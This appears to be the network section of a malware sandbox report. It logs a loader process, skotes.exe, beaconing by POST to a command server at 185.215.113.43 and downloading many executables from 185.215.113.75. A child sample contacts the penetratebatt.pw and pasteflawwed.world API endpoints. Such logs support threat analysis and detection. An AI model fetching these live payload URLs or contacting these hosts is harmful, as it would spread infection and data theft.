                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:47 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:50 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:54 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:57 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:59 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:10 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:13 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:16 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:22 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:27 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:29 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:34 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:38 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:49 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:52 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:09:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:09:04 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:09:07 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:09:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.43:80
                                                            Request
                                                            POST /Zu7JuNko/index.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Host: 185.215.113.43
                                                            Content-Length: 31
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:09:16 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.75/files/5983277008/sQ3DZPU.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.75:80
                                                            Request
                                                            GET /files/5983277008/sQ3DZPU.exe HTTP/1.1
                                                            Host: 185.215.113.75
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:15 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 2229760
                                                            Last-Modified: Thu, 20 Feb 2025 07:13:29 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b6d619-220600"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.75/files/7222648325/a1EoH8b.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.75:80
                                                            Request
                                                            GET /files/7222648325/a1EoH8b.exe HTTP/1.1
                                                            Host: 185.215.113.75
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:18 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 5622120
                                                            Last-Modified: Thu, 20 Feb 2025 11:25:03 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b7110f-55c968"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.75/files/5526411762/MAl7pjE.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.75:80
                                                            Request
                                                            GET /files/5526411762/MAl7pjE.exe HTTP/1.1
                                                            Host: 185.215.113.75
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:27 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 2097664
                                                            Last-Modified: Thu, 20 Feb 2025 11:13:09 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b70e45-200200"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.75/files/SQL_gulong1/random.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.75:80
                                                            Request
                                                            GET /files/SQL_gulong1/random.exe HTTP/1.1
                                                            Host: 185.215.113.75
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:38 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 1805824
                                                            Last-Modified: Sun, 16 Feb 2025 22:05:42 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b26136-1b8e00"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.75/files/smirnov2626/random.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.75:80
                                                            Request
                                                            GET /files/smirnov2626/random.exe HTTP/1.1
                                                            Host: 185.215.113.75
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:43 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 1814016
                                                            Last-Modified: Thu, 20 Feb 2025 12:36:55 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b721e7-1bae00"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.75/files/bonus_max/random.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.75:80
                                                            Request
                                                            GET /files/bonus_max/random.exe HTTP/1.1
                                                            Host: 185.215.113.75
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:50 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 2061312
                                                            Last-Modified: Thu, 20 Feb 2025 12:33:08 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b72104-1f7400"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.75/files/7868598855/DTQCxXZ.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.75:80
                                                            Request
                                                            GET /files/7868598855/DTQCxXZ.exe HTTP/1.1
                                                            Host: 185.215.113.75
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:54 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 342528
                                                            Last-Modified: Mon, 17 Feb 2025 06:32:25 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b2d7f9-53a00"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.75/files/7098980627/7aencsM.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.75:80
                                                            Request
                                                            GET /files/7098980627/7aencsM.exe HTTP/1.1
                                                            Host: 185.215.113.75
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:57 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 278528
                                                            Last-Modified: Tue, 18 Feb 2025 14:27:06 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b498ba-44000"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.75/files/5996006993/dzvh4HC.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.75:80
                                                            Request
                                                            GET /files/5996006993/dzvh4HC.exe HTTP/1.1
                                                            Host: 185.215.113.75
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:07:59 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 8518144
                                                            Last-Modified: Thu, 20 Feb 2025 07:42:11 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b6dcd3-81fa00"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.75/files/6691015685/Bjkm5hE.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.75:80
                                                            Request
                                                            GET /files/6691015685/Bjkm5hE.exe HTTP/1.1
                                                            Host: 185.215.113.75
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:10 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 353280
                                                            Last-Modified: Sun, 16 Feb 2025 19:15:42 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b2395e-56400"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.75/files/1760365699/f3Ypd8O.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.75:80
                                                            Request
                                                            GET /files/1760365699/f3Ypd8O.exe HTTP/1.1
                                                            Host: 185.215.113.75
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:13 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 695808
                                                            Last-Modified: Thu, 20 Feb 2025 09:42:08 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b6f8f0-a9e00"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.75/files/teamex_support/random.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.75:80
                                                            Request
                                                            GET /files/teamex_support/random.exe HTTP/1.1
                                                            Host: 185.215.113.75
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:18 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 2059776
                                                            Last-Modified: Thu, 20 Feb 2025 13:48:19 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b732a3-1f6e00"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.75/files/5125729438/NL58452.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.75:80
                                                            Request
                                                            GET /files/5125729438/NL58452.exe HTTP/1.1
                                                            Host: 185.215.113.75
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:23 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 694784
                                                            Last-Modified: Thu, 20 Feb 2025 08:45:11 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b6eb97-a9a00"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.75/files/osint1618/random.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.75:80
                                                            Request
                                                            GET /files/osint1618/random.exe HTTP/1.1
                                                            Host: 185.215.113.75
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:29 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 2070528
                                                            Last-Modified: Thu, 20 Feb 2025 12:40:40 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b722c8-1f9800"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.75/files/Dat_nope/random.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.75:80
                                                            Request
                                                            GET /files/Dat_nope/random.exe HTTP/1.1
                                                            Host: 185.215.113.75
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:34 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 2105344
                                                            Last-Modified: Thu, 20 Feb 2025 13:52:08 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b73388-202000"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.75/files/ReverseSheller/random.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.75:80
                                                            Request
                                                            GET /files/ReverseSheller/random.exe HTTP/1.1
                                                            Host: 185.215.113.75
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:38 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 10302976
                                                            Last-Modified: Fri, 24 Jan 2025 18:07:34 GMT
                                                            Connection: keep-alive
                                                            ETag: "6793d6e6-9d3600"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.75/files/asjduwgsgausi/random.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.75:80
                                                            Request
                                                            GET /files/asjduwgsgausi/random.exe HTTP/1.1
                                                            Host: 185.215.113.75
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:49 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 332800
                                                            Last-Modified: Fri, 07 Feb 2025 04:36:30 GMT
                                                            Connection: keep-alive
                                                            ETag: "67a58dce-51400"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.75/files/martin2/random.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.75:80
                                                            Request
                                                            GET /files/martin2/random.exe HTTP/1.1
                                                            Host: 185.215.113.75
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:09:07 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 4730880
                                                            Last-Modified: Thu, 20 Feb 2025 12:36:51 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b721e3-483000"
                                                            Accept-Ranges: bytes
                                                          • flag-us
                                                            DNS
                                                            penetratebatt.pw
                                                            1b80ca21fe.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            penetratebatt.pw
                                                            IN A
                                                            Response
                                                            penetratebatt.pw
                                                            IN A
                                                            172.67.161.147
                                                            penetratebatt.pw
                                                            IN A
                                                            104.21.65.100
                                                          • flag-us
                                                            POST
                                                            https://penetratebatt.pw/api
                                                            MAl7pjE.exe
                                                            Remote address:
                                                            172.67.161.147:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: penetratebatt.pw
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:07:32 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=mk0sofesuvnnh2q01eq86sd2ep; expires=Fri, 21 Feb 2025 14:07:31 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EfJNWHdP196WqVM3BUnMCS%2BiPaNB7cS7yEPhtI9b7uqC2PgMpy1fO8iKo89dpkga73ByOO%2BxLGhj5DHCLdaIf%2FYzgDYUnBkEfiVoyia8UQTuIEU6iNDt%2FhR0mm%2F27p1vHQmp"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f103fceba7798-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=25786&min_rtt=20904&rtt_var=13697&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2856&recv_bytes=584&delivery_rate=153033&cwnd=253&unsent_bytes=0&cid=68027d65b6d41b28&ts=292&x=0"
                                                          • flag-us
                                                            DNS
                                                            pasteflawwed.world
                                                            1b80ca21fe.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            pasteflawwed.world
                                                            IN A
                                                            Response
                                                            pasteflawwed.world
                                                            IN A
                                                            172.67.214.11
                                                            pasteflawwed.world
                                                            IN A
                                                            104.21.86.17
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            MAl7pjE.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 403 Forbidden
                                                            Date: Thu, 20 Feb 2025 14:07:32 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Frame-Options: SAMEORIGIN
